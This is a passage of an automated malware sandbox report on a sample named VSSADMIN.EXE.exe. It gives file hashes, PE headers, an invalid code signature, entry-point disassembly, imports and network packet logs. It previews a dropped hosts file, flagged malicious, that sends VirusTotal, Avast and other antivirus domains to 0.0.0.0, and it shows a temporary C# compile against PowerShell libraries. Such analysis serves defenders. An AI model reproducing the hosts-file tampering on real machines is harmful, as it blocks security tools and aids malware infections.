                                                                                                                                                                    SHA-512:D81F62EF115CEA7C59DFCF997CC116B601257389ED111F0B0C972E9CB924AC7AADB4209FCD83C9D484295D7C751A176C44F8C51A8AA3B2F7A41183DD4851B4D5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

                                                                                                                                                                    C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2280
                                                                                                                                                                    Entropy (8bit):4.598600285734304
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFc7ikBp32/Vy5L1vV7XnScMO:vDZEurK9K3Sw5VV7XnN
                                                                                                                                                                    MD5:23C7D0CF7F534AE4B1E210C2B9AC0A49
                                                                                                                                                                    SHA1:5B7932066BE03CC3C16912B00969F72A325620B9
                                                                                                                                                                    SHA-256:C5BB8C177321FC5049EB083B1DD40FFB0AC62AA139D1BF524613E75154E9C365
                                                                                                                                                                    SHA-512:85A6900CE87AC3D6458EA482CD12E08B5B3E7F2FC2E54C5DD0D087B9667F56BD9C49BD5BB6A76C6BE66826CD241B6F889269716871470BCE1AEFCE05B0D2C85C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com...0.0.0.0 www.virustotal.com...0.0.0.0 avast.com...0.0.0.0 www.avast.com...0.0.0.0 totalav.com...0.0.0.0 www.totalav.com...0.0.0.0 scanguard.com...0.0.0

                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.992692630132626
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:VSSADMIN.EXE.exe
                                                                                                                                                                    File size:7'380'816 bytes
                                                                                                                                                                    MD5:b8e16b93be678043ec587ec1c759c2de
                                                                                                                                                                    SHA1:a8c98ba05ac710a92c4df15956f81cf81073746f
                                                                                                                                                                    SHA256:15dd97919ebcb246add4fc9e9b201bdd67da510c79f8d89cb4edc7fbf64858fa
                                                                                                                                                                    SHA512:43728e686d684998e6e80344e7a0f05caa106262cebc5b5815619b74ea7856dab13b2954085e188d7ec3b96581390d86a4d4bef13c3fda9fd26844a9494d571f
                                                                                                                                                                    SSDEEP:98304:9jzHqdVfB2GyuT/9vUIdD9C+z3zO917vOTh+ezsNh75S2zh/hQqIvmJ1YPFlVtqU:9PQsGbT/9bvLz3S1bA32zOqxYPdH
                                                                                                                                                                    TLSH:A57633DAA3C109F4D477C63DC2C28945DAB5752B03A4DA8F03B466B61F1BAD48D3BB12
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:367cdccfcfcfc644

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x14000b340
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x65046D71 [Fri Sep 15 14:42:57 2023 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:2
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:2
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                                                    Import Hash:0b5552dccd9d0a834cea55c0c8fc05be

                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                    • 9/29/2021 2:00:00 AM 9/29/2024 1:59:59 AM
                                                                                                                                                                    Subject Chain
                                                                                                                                                                    • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                    Version:3
                                                                                                                                                                    Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                    Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                    Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                    Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F42F4E60CECh
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    jmp 00007F42F4E608FFh
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F42F4E61264h
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F42F4E60AA3h
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                    jmp 00007F42F4E60A87h
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                    je 00007F42F4E60A96h
                                                                                                                                                                    xor eax, eax
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmpxchg dword ptr [000411ECh], ecx
                                                                                                                                                                    jne 00007F42F4E60A70h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    ret
                                                                                                                                                                    mov al, 01h
                                                                                                                                                                    jmp 00007F42F4E60A79h
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    inc eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    movzx eax, byte ptr [000411D7h]
                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                    mov ebx, 00000001h
                                                                                                                                                                    cmove eax, ebx
                                                                                                                                                                    mov byte ptr [000411C7h], al
                                                                                                                                                                    call 00007F42F4E61063h
                                                                                                                                                                    call 00007F42F4E62192h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F42F4E60A86h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    jmp 00007F42F4E60A96h
                                                                                                                                                                    call 00007F42F4E6E771h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F42F4E60A8Bh
                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                    call 00007F42F4E621A2h
                                                                                                                                                                    jmp 00007F42F4E60A6Ch
                                                                                                                                                                    mov al, bl
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 20h
                                                                                                                                                                    pop ebx
                                                                                                                                                                    ret
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    inc eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    cmp byte ptr [0004118Ch], 00000000h
                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                    jne 00007F42F4E60AE9h
                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                    jnbe 00007F42F4E60AECh
                                                                                                                                                                    call 00007F42F4E611CAh
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F42F4E60AAAh

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3bcd40x78.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x4b4c.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20a0.pdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x707b080x2448
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x570000x758.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x394800x1c.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x393400x140.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x288300x28a00False0.5571334134615384data6.48139234696373IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x2a0000x12ade0x12c00False0.5151302083333333data5.822756630008917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x3d0000x103f80xe00False0.13309151785714285DOS executable (block device driver \377\3)1.8096886543499544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .pdata0x4e0000x20a00x2200False0.4749540441176471data5.22608226661587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    _RDATA0x510000x15c0x200False0.38671875data2.734076656433961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x520000x4b4c0x4c00False0.8816303453947368data7.7097824687179575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x570000x7580x800False0.544921875data5.2576643703968475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_ICON0x522500x25cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0182119205298013
                                                                                                                                                                    RT_ICON0x524ac0x374PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.012443438914027
                                                                                                                                                                    RT_ICON0x528200x495PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0093776641091219
                                                                                                                                                                    RT_ICON0x52cb80x681PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0066066066066066
                                                                                                                                                                    RT_ICON0x5333c0x7f7PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0053948013732221
                                                                                                                                                                    RT_ICON0x53b340xdb7PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced0.9982910851609228
                                                                                                                                                                    RT_ICON0x548ec0x187dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9487956611899825
                                                                                                                                                                    RT_GROUP_ICON0x5616c0x68data0.75
                                                                                                                                                                    RT_VERSION0x561d40x3e8data0.448
                                                                                                                                                                    RT_MANIFEST0x565bc0x58eXML 1.0 document, ASCII text, with CRLF line terminators0.44655414908579466

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                    KERNEL32.dllGetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 15, 2023 22:15:59.762953043 CEST4971580192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:15:59.859477043 CEST8049715208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:59.859648943 CEST4971580192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:15:59.859786034 CEST4971580192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:15:59.958157063 CEST8049715208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:59.959615946 CEST4971580192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:00.055789948 CEST8049715208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:00.057337999 CEST4971580192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:19.236723900 CEST4971780192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:19.333720922 CEST8049717208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.333930969 CEST4971780192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:19.333969116 CEST4971780192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:19.459372044 CEST8049717208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.502365112 CEST4971780192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:19.859539986 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:19.859577894 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.859637976 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:19.901377916 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:19.901459932 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.107892990 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.108346939 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.108427048 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.110073090 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.110239029 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111078978 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111263990 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.111499071 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111499071 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111563921 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.111588001 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.111684084 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111726046 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.111836910 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.111885071 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.111985922 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112015963 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112049103 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112062931 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112092018 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112107038 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112238884 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112256050 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112298012 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112313032 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112356901 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112375021 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112399101 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112411976 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112472057 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112488031 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112509966 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112526894 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.112580061 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112601042 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112643957 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112668037 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112726927 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112780094 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112823963 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112888098 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112947941 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.112998962 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.152721882 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.153059959 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153127909 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153165102 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153189898 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153227091 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153244972 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153310061 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153372049 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153428078 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.153460979 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.196721077 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.197046041 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197122097 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197160006 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197187901 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197220087 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197242022 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197261095 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197288036 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197320938 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.197351933 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.244689941 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.244900942 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.244956970 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.244987011 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.245026112 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.245066881 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.292692900 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.295808077 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.296055079 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.296070099 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.296166897 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.296466112 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.296533108 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:20.336715937 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.389039993 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.487620115 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:20.591521025 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:21.306128979 CEST44349718162.159.138.232192.168.2.4
